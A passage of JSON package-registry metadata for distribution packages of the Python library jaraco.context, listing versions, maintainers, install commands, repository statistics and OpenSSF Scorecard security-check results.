st_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4331,"html_url":null,"role":null,"created_at":"2026-03-03T22:34:46.839Z","updated_at":"2026-03-03T22:34:46.839Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3080},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-08-24T05:04:51.596Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":8677082,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_number":"4.3.0-r1","last_synced_at":"2026-03-25T00:07:54.901Z","created_at":"2023-12-20T10:28:03.900Z","updated_at":"2026-08-06T19:26:18.240Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.240Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context-pyc/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2188,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2026-02-24T23:15:09.087Z","updated_at":"2026-02-24T23:15:09.087Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3176,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":957},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-08-24T05:06:38.587Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":13204006,"name":"python312Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T00:57:43.301Z","latest_release_published_at":"2026-02-02T00:57:43.301Z","latest_release_number":"4.3.0","last_synced_at":"2026-03-09T04:09:44.094Z","created_at":"2026-02-02T00:57:40.322Z","updated_at":"2026-08-06T19:26:18.269Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python312Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python312Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/jaraco-context/default.nix#L33","metadata":{"nix_attribute":"python3.12-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:33","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.269Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python312Packages.jaraco-context?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/j